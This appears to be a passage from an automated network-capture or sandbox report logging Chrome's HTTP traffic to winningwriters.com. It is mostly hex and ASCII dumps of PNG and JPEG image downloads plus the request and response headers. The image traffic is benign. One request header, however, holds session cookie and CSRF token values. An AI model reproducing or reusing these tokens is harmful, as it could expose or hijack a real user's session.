                                                                                                                                                                                            2024-11-18 20:00:06 UTC7821INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 ca 00 00 00 fa 08 06 00 00 00 79 fd be 04 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 04 66 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 27 ef bb bf 27 20 69 64 3d 27 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 27 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 27 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 27 3e 0a 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 23 27 3e 0a 0a 20 3c 72 64 66 3a 44 65 73 63 72 69 70
                                                                                                                                                                                            Data Ascii: PNGIHDRypHYs+fiTXtXML:com.adobe.xmp<?xpacket begin='' id='W5M0MpCehiHzreSzNTczkc9d'?><x:xmpmeta xmlns:x='adobe:ns:meta/'><rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'> <rdf:Descrip
                                                                                                                                                                                            2024-11-18 20:00:06 UTC8000INData Raw: 87 ba 66 0d f8 3d d1 15 41 2f 0c 47 e8 db d3 10 be 74 31 22 57 af 46 f5 6f 56 a1 fa c2 f9 08 7f eb 4d 84 8e 1e 09 ff a7 7a 42 53 bb 16 a8 60 01 13 c9 0f 06 ae 49 e9 a8 d1 04 3e 3d 03 e0 85 0a f7 96 28 53 a1 ec 38 9b ee 48 6e 6e 2e da b6 6d 8b a9 53 a7 56 fa ba 7e 49 49 49 6e 97 b5 7a f5 d5 57 91 9a 9a ea d4 76 f8 f0 61 bc f3 ce 3b c5 3e 6e bb 76 ed 64 af df ac 59 b3 f0 e5 97 5f 16 6b 5f 75 ea d4 91 b5 64 38 72 fd fa 75 4c 99 32 05 26 93 49 b2 ac 34 dd 37 13 13 13 dd 2a f7 a5 d3 e9 30 76 ec 58 d9 99 c9 1b 37 6e a0 6f df be d0 e9 74 b2 db 2a b9 7d 2e 58 b0 00 df 7e fb 6d b1 fa 5b 5c 6a d5 aa 05 3f 3f 3f a7 b6 c4 c4 44 0c 1a 34 48 36 5e bf 30 b2 b2 b2 d0 b7 6f df 42 05 41 51 cc 9a 35 ab 44 25 41 f6 ed db 87 91 23 47 ca cf 0c 97 13 d9 d9 d9 58 ba 74 a9 ec a0
                                                                                                                                                                                            Data Ascii: f=A/Gt1"WFoVMzBS`I>=(S8Hnn.mSV~IIInzWva;>nvdY_k_ud8ruL2&I47*0vX7not*}.X~m[\j???D4H6^0oBAQ5D%A#GXt
                                                                                                                                                                                            2024-11-18 20:00:06 UTC8000INData Raw: de 7d 5f 8b d2 20 39 39 19 6d db b6 c5 ec d9 b3 11 13 13 83 e4 e4 64 cc 9b 37 4f d6 ed 57 ad 56 63 e4 c8 91 4e 6d fd fb f7 47 54 54 14 fe fe fb 6f a7 f6 1b 37 6e a0 45 8b 16 78 e3 8d 37 d0 a1 43 07 f8 fa fa e2 ce 9d 3b f8 f5 d7 5f b1 7a f5 6a 64 64 64 c0 c7 c7 07 31 31 31 8a 2e 66 85 e1 e9 e9 89 87 1f 7e 58 d2 cf bc bc 3c 74 ea d4 09 bd 7a f5 c2 9d 3b 77 b0 77 ef 5e 1c 3f 7e dc 3e b1 33 66 cc 18 cc 9f 3f 5f 52 f6 2a 31 31 11 5d bb 76 c5 94 29 53 50 a3 46 0d 5c b8 70 01 73 e6 cc 91 1d 88 f7 ea d5 0b 8f 3d f6 58 b1 fa 4b 08 c1 94 29 53 30 6a d4 28 c9 b2 b7 df 7e 1b 77 ee dc 41 6c 6c 2c 08 21 d8 be 7d 3b 96 2e 5d 2a bb 9f e9 d3 a7 4b da aa 57 af 2e a9 c7 2b 08 02 46 8e 1c 89 89 13 27 22 33 33 13 9f 7c f2 89 62 ad dd ff 02 93 26 4d c2 8a 15 2b 24 c9 d3 76 ec
                                                                                                                                                                                            Data Ascii: }_ 99md7OWVcNmGTTo7nEx7C;_zjddd111.f~X<tz;ww^?~>3f?_R*11]v)SPF\ps=XK)S0j(~wAll,!};.]*KW.+F'"33|b&M+$v
                                                                                                                                                                                            2024-11-18 20:00:06 UTC8000INData Raw: 18 6d 1a 40 ce 0a 9e 01 06 16 2a d4 39 d7 8c 0b 5b 18 6b a3 88 72 c6 9d 7d 23 10 a1 2c 08 82 20 08 82 20 6c 5d 94 c2 1d 2b e3 16 8b 69 04 38 15 6e eb d5 6e 26 16 dd a9 73 75 92 56 1c 04 28 d7 c5 9d 9a 20 b7 6b 17 fe 2f be 12 6f c7 76 9c 4a 05 e5 fb e8 99 59 96 bf 7a 37 e1 fc 02 ca 71 b6 84 58 b4 99 7b 6a 93 c5 80 78 f5 20 7b 6d e9 df 20 fe 33 a4 82 9a b3 b4 a5 12 2e 0e 86 3e 9f 66 66 16 d3 ed e2 94 cb 1b 36 05 11 ca c2 45 49 fb f1 c7 59 fa 8f af d0 9b 9d c5 df b5 8b c9 f7 de 41 e1 aa ab 36 7b 5a e7 84 0d 43 96 be 72 37 cd 87 1e c2 06 3d 8a af b9 96 c9 3b ef c4 1d 1f db ec a9 5d 14 74 8f 1e a5 f6 a5 2f 13 9c 3c 85 b7 6d 9a ea bb 7e 83 f2 eb af df ec 69 09 02 8b 5f fa 32 f5 7d fb 28 5e 7b 0d c5 ab af a6 70 cd d5 f8 db b7 6f f6 b4 04 61 63 88 bf 6c 3b e5 32
                                                                                                                                                                                            Data Ascii: m@*9[kr}#, l]+i8nn&suV( k/ovJYz7qX{jx {m 3.>ff6EIYA6{ZCr7=;]t/<m~i_2}(^{poacl;2
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: a6 9b 1b b5 a1 81 f6 ab ae cc 8b d9 e2 45 d0 a1 e7 9e c3 18 18 b4 ed 53 7b c2 f1 b6 b2 1c 25 10 a0 e6 63 87 33 70 4f 69 19 44 fc bf cf 63 26 12 f9 df f8 2d 7d 9d b8 6c 7f 08 4d 43 6b 6e b4 52 82 8b 04 e7 a8 25 58 49 2d 2d c8 4c 1a bd bf df 56 26 20 2a 89 3a a7 e8 ae 94 28 5e 0f 5a 53 23 e9 ff bd 85 d1 dd 8b a7 71 f8 3e e5 e5 c6 5a 89 b7 df 21 fe df ff 60 44 22 28 a1 10 5a 5d 3d d2 30 50 9b 2b 1c a7 28 15 5b f1 fb a9 da 73 cf d2 3a e1 62 67 ec 72 61 9e 4b 01 57 55 94 40 80 4c 77 b7 95 c9 a3 69 a5 11 fa e2 76 51 52 22 4d 93 e8 33 cf 30 f0 a7 3f 63 f6 f4 23 0d 1d 92 49 10 82 c0 be f3 a8 fd c4 e7 21 9d a6 6b fd 5a f4 ae 1e ab 06 b5 48 68 e7 a2 da d2 15 cc 3b 15 e5 b9 1e 7a 3c 86 11 1d 9b 39 ea 86 e2 0a e5 9d 98 86 5c 9b 80 32 62 b1 d8 16 9b 43 25 07 dc f4 9a
                                                                                                                                                                                            Data Ascii: ES{%c3pOiDc&-}lMCknR%XI--LV& *:(^ZS#q>Z!`D"(Z]=0P+([s:bgraKWU@LwivQR"M30?c#I!kZHh;z<9\2bC%
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 53 93 eb 4b ba 41 fb 7a bd 15 a3 bf 23 a1 54 55 8d 79 61 c1 3e 01 cb 01 d7 29 0a bc 3d 10 7f f1 25 db d8 b6 ec 76 3d 5a 94 60 10 65 84 52 9f b1 b0 2d 5c 27 2e db 16 6a 6d 0d 8a d7 8b 59 24 0c 37 fa 56 5b 02 a6 44 ef eb 47 c6 e3 50 5d 9d 4f ab 75 aa 37 16 9a 8a 67 dc 78 f0 78 0b 35 bb 08 cc 8c 4e f2 dd f7 41 0a f4 d5 ab d1 bb bb 2d 71 dc dd 83 de dd 8b f1 e1 0a cc a1 28 32 9d c1 54 3d 79 23 a7 dc 31 2a df cb 89 ac 9e 90 59 eb 31 f2 d9 40 b9 b3 e7 8d a0 72 8f 45 56 3a 8f 94 6b bd 23 22 b3 ef 53 71 2d 71 76 3c 27 84 11 22 fb fe 4b 6b c1 c5 30 0b 8b 0a 89 38 de 71 6d 78 8f 39 0a ad 2e 8c cc 64 d0 7b fb 90 86 81 d6 d0 88 d6 66 45 83 3d 2d 2d 68 ad 2d 28 c1 00 c2 e7 47 ef ec 64 fd f2 15 64 06 07 40 48 d4 ba 5a bc 93 26 22 82 41 fb 67 5b f4 d8 18 1c 24 d3 d3 0b
                                                                                                                                                                                            Data Ascii: SKAz#TUya>)=%v=Z`eR-\'.jmY$7V[DGP]Ou7gxx5NA-q(2T=y#1*Y1@rEV:k#"Sq-qv<'"Kk08qmx9.d{fE=--h-(Gdd@HZ&"Ag[$
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: ef 43 7d b2 36 c3 e5 44 6d df 0e a3 c1 87 5e 5d 6d e6 80 76 38 9a d2 31 45 5f db 30 50 14 05 35 3d 13 61 c4 9f 49 11 6e f0 12 60 18 48 29 69 a8 9d 3b 9b f5 5b c6 21 7c 9c 05 fe 5d bb 10 de 06 c8 74 06 ef 8d f4 3f 13 a4 6c de 57 29 1c bb af 97 97 23 1a 1a 10 a9 a9 6d e6 7e 9d 20 ca 09 b4 0a 7e bf 9f 9d 3b 77 52 5e 5e ce 09 27 9c b0 4f 75 dd 75 d7 5d 2c 5c b8 10 23 ea 21 33 61 c2 04 1c d6 87 c3 6f 0c 86 61 50 52 52 42 71 71 31 bd 7a f5 22 35 35 f5 60 37 a9 cd e1 f1 78 28 2a 2a 42 08 41 cf 9e 3d 0f 76 73 12 f8 0d 22 31 87 12 38 50 a8 a9 a9 a1 b8 b8 98 e4 e4 64 0e 3d f4 d0 83 dd 9c 04 7e a5 90 93 92 71 14 16 ee 5d 6a 28 0b c2 36 4e 59 82 da 7a 02 bb 76 9a 29 a2 d4 66 96 dc 42 20 25 b9 50 f3 b3 01 1d dd eb 0d ab 31 c7 75 09 0e fe db 99 93 43 cd 9a 9f 29 bd f7
                                                                                                                                                                                            Data Ascii: C}6Dm^]mv81E_0P5=aIn`H)i;[!|]t?lW)#m~ ~;wR^^'Ouu],\#!3aoaPRRBqq1z"55`7x(**BA=vs"18Pd=~q]j(6NYzv)fB %P1uC)
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: c7 1e 6b 3b df c6 8d 1b c7 e1 87 1f 1e 63 f1 58 bb 76 2d 6e b7 9b 2c 4b 1a 88 c5 8b 17 db 6a 06 48 92 c4 ab af be 1a 63 01 99 3f 7f 3e 8f 3c f2 08 53 a7 4e 8d 20 92 d3 a7 4f e7 c7 1f 7f 8c a9 c7 e5 72 f1 e1 87 1f 72 de 79 e7 85 cb 0c c3 e0 a3 8f 3e e2 f5 d7 5f 8f b1 1c 3f f3 cc 33 b6 64 fb fd f7 df 0f ff d6 d3 d3 d3 b9 e3 8e 3b d8 b1 63 07 93 26 4d 8a 38 ee 5f ff fa 17 8f 3f fe 78 58 63 61 f9 f2 e5 31 75 81 e9 61 61 7d 1e 8c 19 33 86 89 13 27 32 6d da 34 ea eb eb c3 a2 4e 21 c4 b3 92 be fd f6 db 11 71 95 a3 46 8d e2 89 27 9e e0 f3 cf 3f e7 c7 1f 7f b4 9d 8b f1 d0 16 73 e8 e9 a7 9f b6 dd cc 3c e3 8c 33 f8 f4 d3 4f c3 56 b5 1b 6f bc 91 49 93 26 71 c7 1d 77 c4 1c 3b 71 e2 44 6e bb ed b6 56 59 e0 7c 3e 1f 4f 3c f1 84 ed 77 93 27 4f e6 fa eb af 0f 7f be f5 d6
                                                                                                                                                                                            Data Ascii: k;cXv-n,KjHc?><SN Orry>_?3d;c&M8_?xXca1uaa}3'2m4N!qF'?s<3OVoI&qw;qDnVY|>O<w'O
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 78 f5 d5 57 51 5e 5e 8e ec ec 6c 6c df be 1d 91 91 91 75 1d 86 c7 82 b2 b2 32 c4 c4 c4 e0 fc f9 f3 18 39 72 24 d2 d3 d3 31 76 ec 58 f4 ed db 17 c1 c1 c1 30 18 0c d8 bf 7f 3f 16 2c 58 20 7a bc bd b5 a9 73 e7 ce a2 69 76 52 52 52 f0 fb ef bf 43 a9 54 e2 e7 9f 7f c6 98 31 63 90 96 96 86 a0 a0 20 68 b5 5a 87 0d 8c 9b 37 6f 62 d2 a4 49 48 49 49 01 41 10 d8 b3 67 0f d2 d2 d2 44 2d 08 66 b3 19 eb d6 ad c3 84 09 13 1e 61 24 9c 43 ab 56 ad 44 fb fb f7 df 7f 23 32 32 12 91 91 91 b8 7e fd 3a 7e fb ed 37 5c ba 74 c9 69 b7 c9 b0 b0 30 51 77 d5 84 84 04 2c 59 b2 04 81 81 81 b6 14 28 52 de 2a 6b d7 ae 45 df be 7d 6d 29 70 12 12 12 30 6f de 3c 87 cd 2e 83 c1 80 41 83 06 a1 5f bf 7e e8 d4 a9 13 aa aa aa 70 f2 e4 49 1b b1 f2 f7 f7 c7 b2 65 cb 6c f5 ff fd ef 7f 23 33 33 d3
                                                                                                                                                                                            Data Ascii: xWQ^^llu29r$1vX0?,X zsivRRRCT1c hZ7obIHIIAgD-fa$CVD#22~:~7\ti0Qw,Y(R*kE}m)p0o<.A_~pIel#33
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: ce 91 35 98 24 b9 64 09 b1 3f dc 45 ea b5 d7 90 ba 00 69 17 67 6e 57 55 64 11 c5 75 05 09 a9 14 56 77 17 d2 b2 5c eb 6e 8f 06 4f 28 ef 42 16 2f 5e cc 99 67 9e c9 cb 2f bf cc 33 cf 3c c3 8a 15 2b 68 6b 6b 23 1e 8f 93 cb e5 d0 75 9d 9a 9a 1a 26 4d 9a c4 9c 39 73 98 3f 7f 3e 47 1e 79 64 b1 f6 b4 87 87 87 87 87 87 87 87 c7 f8 23 84 50 e5 8e 5a 5a b0 07 07 95 48 41 b9 34 6f 37 79 0b 9d b3 4c 93 1c 8c 13 3a e4 10 ea 3e f9 49 c2 87 1f 8a d1 dc 8c 28 58 fb 5c 30 9a 9b 09 cc 9a 49 78 de 11 d4 9d 72 0a 89 67 9e 21 76 d7 9f c9 b5 77 81 00 3d 1c a1 f1 fc af 11 5d b0 00 91 b7 56 0e 8d 83 1d f6 fa 87 c4 c8 02 e8 d1 28 75 67 2d 26 b7 75 0b f1 7f 3e 04 42 c7 6c ef 2c db c7 2d d6 57 79 8f ab c4 5a 99 f5 1b c8 b6 6d 25 34 67 8e 4a 22 55 18 93 8b 48 45 08 44 24 82 6f af d9
                                                                                                                                                                                            Data Ascii: 5$d?EignWUduVw\nO(B/^g/3<+hkk#u&M9s?>Gyd#PZZHA4o7yL:>I(X\0Ixrg!vw=]V(ug-&u>Bl,-WyZm%4gJ"UHED$o


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            21192.168.2.164973766.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:06 UTC667OUTGET /graphics/advertising/origin_story_banner_for_ww_2408.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:06 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:06 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Sun, 18 Aug 2024 15:34:11 GMT
                                                                                                                                                                                            ETag: "1be03-61ff6ec8f6668"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 114179
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:06 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:06 UTC7835INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 5a 00 00 ff e1 04 15 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72
                                                                                                                                                                                            Data Ascii: JFIFddDuckyZhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:r
                                                                                                                                                                                            2024-11-18 20:00:06 UTC8000INData Raw: a7 45 4a d1 1f 9b 9d 59 ef bb ba 6f 1b d7 f6 3f 49 e2 78 d7 dc 9c 54 ee 56 8e 9c 5a 8e 94 5e 99 3f 80 d7 24 b3 a7 20 31 05 cd 08 9e 60 87 66 f6 de 98 37 53 36 49 02 fe 6c 0c 50 38 a4 ab 61 10 de 40 35 76 98 06 bf bf ac cb 7d 39 b6 67 5a 93 c5 6f 9a 3f bb b4 e4 77 5f 79 4f 34 7a 13 78 b1 1e a8 b3 6e 78 b7 9d 3e 6c 63 c2 ba f2 ca 0e 95 8f 73 e2 74 0d 9b a4 5f 36 6e f1 b2 80 b3 67 69 91 56 ea 87 63 11 42 81 ca 21 f4 80 eb cc 2e db 70 74 7c 51 fa 99 81 9b 6b 26 c4 6f 5b 75 84 d2 69 f7 a6 aa 98 86 f2 03 30 be c3 b6 bb 29 58 d8 2f be 5f cb 2e 66 ed 55 53 70 35 6e 60 26 fd ca 89 3a 8d 7b 14 a1 4a fb 75 d0 f4 ce c3 1c fb ce 32 97 2a 4a be 93 e6 cf 7a 3f 3e f2 7a 07 66 86 4e 3d 8f 1a e5 d9 72 a6 fe 84 74 ad 65 4d 7d 4b e3 36 3c 41 96 20 f2 c5 aa ce 66 39 74 d3 96
                                                                                                                                                                                            Data Ascii: EJYo?IxTVZ^?$ 1`f7S6IlP8a@5v}9gZo?w_yO4zxnx>lcst_6ngiVcB!.pt|Qk&o[ui0)X/_.fUSp5n`&:{Ju2*Jz?>zfN=rteM}K6<A f9t
                                                                                                                                                                                            2024-11-18 20:00:06 UTC8000INData Raw: 49 56 4a 80 a2 9b d3 a7 f0 9b cb 03 d3 6a 81 4e a9 fd 22 1a c2 ea 2e 95 96 3f f1 b6 be 75 a7 da b5 a1 db fb b8 7b d7 58 ea 2b 9f d9 5b bc 7f 0b ba 43 e6 b8 cb e6 ab 8d 69 f3 53 e1 2e f8 fc 28 bd e4 be 4d 79 69 5b 4d ac eb 60 4c bd f1 7e 98 59 c3 b7 4a a2 aa 68 28 60 48 ea 85 3a 81 87 76 d2 7b c4 47 c0 75 4f 48 ed 51 bd 73 c5 b9 fe 6e 1a b3 65 ef 7b e7 05 fd 93 67 8e d5 b7 d6 5b 8e 73 f0 e1 18 f1 51 7a 4a 5a 3f 4d 13 f5 be c3 73 c1 b8 a9 9e 27 b2 19 c2 ed 2a 93 cf f6 b8 b9 5f 00 00 8a 8e 8c 5a 6c 01 fe 2a 61 f0 97 eb 1f 1d 61 75 16 ee f3 72 1c fe aa d1 2f 41 e8 1e ed 9e 49 63 f4 47 4e 43 1b 47 93 73 e7 5d 97 6b 9b 5a aa f7 47 54 85 a3 5c e9 f4 22 0d 04 86 80 0d 00 1a 00 34 00 68 00 d0 01 a0 03 40 06 80 0d 00 1a 00 34 00 68 03 e9 d0 40 af 43 05 29 db a5 07
                                                                                                                                                                                            Data Ascii: IVJjN".?u{X+[CiS.(Myi[M`L~YJh(`H:v{GuOHQsne{g[sQzJZ?Ms'*_Zl*aaur/AIcGNCGs]kZGT\"4h@4h@C)
                                                                                                                                                                                            2024-11-18 20:00:06 UTC8000INData Raw: 26 21 fc 90 a6 21 b4 ff 00 4d 51 ae 1c 0f e4 e6 ac 56 2c 9b e6 d5 c8 30 28 dc 76 8c a9 25 a3 55 51 44 56 1d aa 22 bb 67 28 8e c5 5b b8 6e e0 a4 59 05 d2 35 4a a2 4a 94 a7 20 f4 30 00 ea c4 fb 49 e6 2f ee 08 06 17 1b 20 68 f4 54 40 e9 98 15 8e 92 40 c0 9b 96 8e 0a 02 05 55 15 04 07 69 c2 be 20 20 20 22 53 00 94 44 06 64 aa 40 96 b0 c8 72 d6 75 c9 1f 64 65 50 4d 0f bf 8e 9b 7b 17 25 24 4f 22 32 65 75 04 4a 56 6e 02 a2 56 92 1f c5 4c c3 b1 7e e8 8e ed c9 26 bc f4 d1 92 a4 2d 15 e8 50 11 01 37 88 f7 f1 e9 ab 2a 47 33 24 3d 7a 50 37 08 f5 00 1e be 3e ed 40 0d af 90 78 09 ce 4f 4a de bd ac 2b 8c 31 f6 77 c6 87 59 d6 29 c8 80 43 2a 92 27 5c a5 07 11 f2 08 90 4b f3 31 af 00 85 2b 84 04 7c 01 42 09 54 21 4c 09 38 d7 81 05 2e 3c 72 14 32 e9 2e 4b 2a f7 b7 7f 66 b9
                                                                                                                                                                                            Data Ascii: &!!MQV,0(v%UQDV"g([nY5JJ 0I/ hT@@Ui "SDd@rudePM{%$O"2euJVnVL~&-P7*G3$=zP7>@xOJ+1wY)C*'\K1+|BT!L8.<r2.K*f
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 04 a5 1e 81 df 55 c9 15 b8 ea 78 cd 30 a2 05 1d a5 10 30 7d ae b5 0e 83 a5 62 c8 b3 35 4e 7d b5 f8 ba 8f b0 34 10 1e 49 44 d5 10 1f 70 7e ff 00 6d 15 0a 95 85 0f 2c 2b b0 48 63 53 a0 d7 f8 40 35 00 51 14 44 e6 a8 1b af 4a 85 74 01 54 89 54 03 c3 bf 4e 9a 09 a0 54 a1 42 85 44 dd c0 a0 1d 74 10 7d 0c bf 0a b7 0e 7f 64 bc 4d bd 39 55 72 47 7c bd d9 c9 27 e5 42 d7 70 62 51 54 ed 98 15 55 6c 41 28 88 57 6b 87 47 54 44 3b 08 10 83 ec d6 45 94 5f 69 1e aa 24 24 4b 15 1a f6 45 44 cc a9 59 a4 65 3c 92 00 6f 38 94 37 6d 00 f6 8d 28 01 ab 9b 69 16 49 d1 1c 69 6b ca 1c a1 3f 27 2b c7 0e 23 b9 86 89 b8 a1 64 66 1f e7 9e 49 ce 21 f7 a4 63 6b 86 42 55 c3 e9 d4 a0 58 1d c3 34 de 83 17 4a aa 8a af 1d 38 49 a3 73 13 c8 2f cc 2c 43 a0 5a a3 27 c0 44 db 37 6b d3 8b d8 c1 85
                                                                                                                                                                                            Data Ascii: Ux00}b5N}4IDp~m,+HcS@5QDJtTTNTBDt}dM9UrG|'BpbQTUlA(WkGTD;E_i$$KEDYe<o87m(iIik?'+#dfI!ckBUX4J8Is/,CZ'D7k
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 52 8f d2 4d 7a d1 8b 87 b9 e3 64 26 ed 4e 33 4b f4 5a 7f 21 75 a4 33 c8 08 d3 e9 d4 a8 d4 59 49 20 af b0 2b a9 51 a9 1c c8 86 ef 77 4f 6e 9b c3 63 27 ec 0d c1 f5 e9 1a a3 a7 68 57 5a 76 93 0f 4d 40 37 42 5d e1 df 4c 92 17 9c 37 75 a5 3a fb 35 14 0f 12 3d e4 40 6b a8 a0 c9 85 7d d5 d4 d0 8e 6d 68 15 f7 68 71 21 4d 3e 01 ba 9e 1a 9e 52 5c 8b 65 de b5 6a 40 51 d3 84 da a6 23 42 a8 a1 ca 40 11 f7 09 84 34 d0 b5 29 70 4d 98 59 7b a6 36 3a 4e ec e3 04 fb 64 d2 f9 59 70 43 01 ca 53 94 40 c4 30 54 a6 01 a8 08 7b 84 34 92 54 74 66 55 9b f1 b9 05 28 ba c5 f0 64 da 82 d0 d0 01 a0 03 40 06 80 0d 00 1a 00 34 00 68 00 d0 01 a0 03 40 06 80 0d 00 1a 00 34 00 68 00 d0 01 a0 03 40 06 80 0d 00 1a 00 fa 70 54 06 95 1e be 03 4a 75 10 d7 d3 e7 f2 78 88 8e c3 16 86 0e a1 d8 3c
                                                                                                                                                                                            Data Ascii: RMzd&N3KZ!u3YI +QwOnc'hWZvM@7B]L7u:5=@k}mhhq!M>R\ej@Q#B@4)pMY{6:NdYpCS@0T{4TtfU(d@4h@4h@pTJux<
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: e8 a6 10 d3 8d 4a 44 8c 6a 98 c4 28 00 08 88 88 e8 76 90 28 97 76 0f 15 b8 25 c7 bb e1 d4 b6 3e e2 b7 93 91 63 4e 41 5b 26 05 83 72 dc b3 07 39 88 53 81 c9 72 3f 62 f5 65 86 86 00 13 15 d1 a8 35 01 1a 80 d1 54 62 4a 80 f8 a0 ee 48 f9 b3 93 e5 a1 24 99 01 b7 0a 6b 3e 8d 74 d0 04 00 a1 dc ce 08 51 ad 06 9d 7b f5 d3 68 4b 8a 18 87 08 05 d4 ed e3 75 cd ce 2d e7 4c 5b 56 9d b1 1c c4 aa 54 44 a3 2d 2f 3b 37 22 b0 6e ec 2e 1c 88 14 fd 7a 8a 21 ec d2 db 5a 89 cb a9 d2 c2 01 40 04 a3 4e a2 1d 00 7b f4 a5 75 79 34 20 a6 c2 91 41 30 85 00 03 71 44 7a 6d 0e ba 09 e5 13 c7 d9 5b 16 c5 ca 35 82 93 c9 10 31 d3 ce 68 54 61 57 98 8d 45 da 82 26 02 80 15 25 16 03 8d 4c 60 0e 81 dc 75 1c c8 86 6d cf ee eb 52 0e 39 69 49 ab 92 3e 26 2d 03 18 ae 24 1c bc 6e 83 74 cc 41 a0 81
                                                                                                                                                                                            Data Ascii: JDj(v(v%>cNA[&r9Sr?be5TbJH$k>tQ{hKu-L[VTD-/;7"n.z!Z@N{uy4 A0qDzm[51hTaWE&%L`umR9iI>&-$ntA
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 76 5a c8 e5 38 07 18 8a d8 51 55 25 2d 7b dd de c5 1e ac d8 82 a1 59 84 84 59 57 5d c2 22 20 1e 43 63 37 5d 65 0d 43 09 c4 0a 70 4e b9 31 25 23 c8 6e 16 f5 6c cf 5c 58 ce 2c 32 5e 09 96 96 b6 b1 ec ac db a9 8b b3 17 99 cb 88 fb 5e 78 af 1c 95 55 d3 2c 1c 7a a4 60 cd 32 0e f0 40 8d 8b f0 14 40 a7 3a 9b 77 1a 2a 54 a7 46 7b f6 e2 9f aa 25 9f 9f 31 25 9f 97 5f da c2 fb 1d 5c e4 40 ab e4 7b 7d 53 48 47 46 48 09 09 f3 0c e6 1b 2e 52 2b 18 ba 07 36 d3 91 53 9c a2 14 31 0e 72 89 4c 37 46 e1 62 b8 8e a3 db 17 6d a7 7a 46 a1 35 67 dc cc ee 48 85 ff 00 92 93 8f 78 8b b4 4c 21 dc 00 e8 18 e5 a8 57 b5 75 72 75 1c da 40 b5 11 1d dd 42 bd 46 9e 3f 40 69 85 6c a2 64 12 5d 33 22 a9 41 64 54 03 15 44 8c 00 62 98 07 a0 80 d4 3c 43 43 25 33 97 79 03 d2 eb 1e 43 e4 f9 4e 40
